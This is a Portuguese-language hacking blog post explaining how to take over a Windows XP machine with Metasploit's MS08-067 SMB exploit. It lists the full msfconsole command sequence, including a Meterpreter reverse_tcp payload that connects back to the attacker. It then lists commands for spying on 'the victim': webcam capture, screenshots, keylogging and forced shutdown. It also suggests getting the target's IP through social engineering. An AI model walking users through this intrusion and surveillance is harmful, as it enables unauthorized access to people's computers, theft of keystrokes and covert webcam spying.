INCIO

GREEN HAT

ENTRE NA MATRIX

FAQ

SOBRE NS

Invadindo Windows XP
[Metasploit]
27 DE ABRIL DE 2015 / S0PH0S

Hoje traremos um tutorial voltado a pentest em sistema operacional XP, mesmo

estando descontinuado pela Microsoft ainda ele muito utilizado por bancos, sistemas
comerciais, entre outros servios. Utilizaremos um exploit que explora a falha da porta

Pesquisar

PESQUISAR

Como previsto na Lei 12.737/2012 no

Art. 154-A invadir dispositivo
informtico alheio, conectado ou no
rede de computadores, mediante
violao indevida de mecanismo de
segurana e com o fim de obter,

smb (445) que permite uma conexo remota com a vtima. Ou seja ao conectarmos a

adulterar ou destruir dados ou

ela teremos controle total sobre o sistema dela, a qual permite interceptar dados,

informaes sem autorizao expressa

enviar malwares, acessar dispositivos na rede, entre outras coisas. Estaremos

ou tcita do titular do dispositivo ou

utilizando o Kali Linux como exemplo mas necessita apenas baixar e instalar o

instalar vulnerabilidades para obter

Metasploit.

vantagem ilcita. Pena deteno, de 3

(trs) meses a 1 (um) ano, e multa.

Primeiro abra o terminal e digite comando que ir abrir nossa Metasploit:

# msfconsole

Ajude o CIncia Hacker

Agora setamos o nosso exploit que iremos utilizar para invaso, como citei ele explora
a falha na porta SMB
Cincia Hacker
YouTube

6K

# use windows/smb/ms08_067_netapi
Aps isso colocamos o IP de nosso alvo a qual voc pode descobrir atravs de uma
engenharia social ou ferramenta de captura de IP.

Tweets de @cienciahacker

# set RHOST 192.168.2.108

Setamos nosso PAYLOAD que far a nossa interao com o a vtima.

Cincia Hacker

# set PAYLOAD windows/meterpreter/reverse_tcp

E o nosso IP que receber a conexo da vtima.

# set LHOST 192.168.2.103

Por ltimo rodamos o exploit.

# exploit
Quando inserir o ultimo comando automaticamente ele ir se conectar com a vtima,
permitindo que voc controle ela do jeito que quiser. Alguns comandos que podem ser
usados durante a conexo com a vtima:

webcam_snap (tira a foto pela webcam)

screenshot (tira print da tela da vtima)
keyscan_start (inicia processo de capturar teclas digitas)
keyscan_dump (mostra as teclas digitas da vtima)
shutdown -s -t 1 (desliga computador da vtima)
sysinfo (mostra a verso do sistema operacional e informaes dela)

Nota: Esse processo pode falhar se as atualizaes do sistema operacional estiverem

atualizadas, ou tenha algum firewall que posso bloquear essa conexo.

Artigos, Pentest
I NVADI NDO EXPLOI T WI NDOWS XP METASPLOI T

s0ph0s@cienciahacker:~# whoami _
"With great power comes great responsibility"

Compartilhe esse post:

Facebook

Twitter

Google+

Instalando e usando o Proxychains

Testando vulnerabilidade em sites com Acunetix (Scanning)

Deixe uma resposta

O seu endereo de email no ser publicado Campos obrigatrios so marcados *
Nome *

Email *

Site
Comentrio

Voc pode usar estas tags e atributos de HTML: <a href="" title=""> <abbr
title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del
datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

Publicar comentrio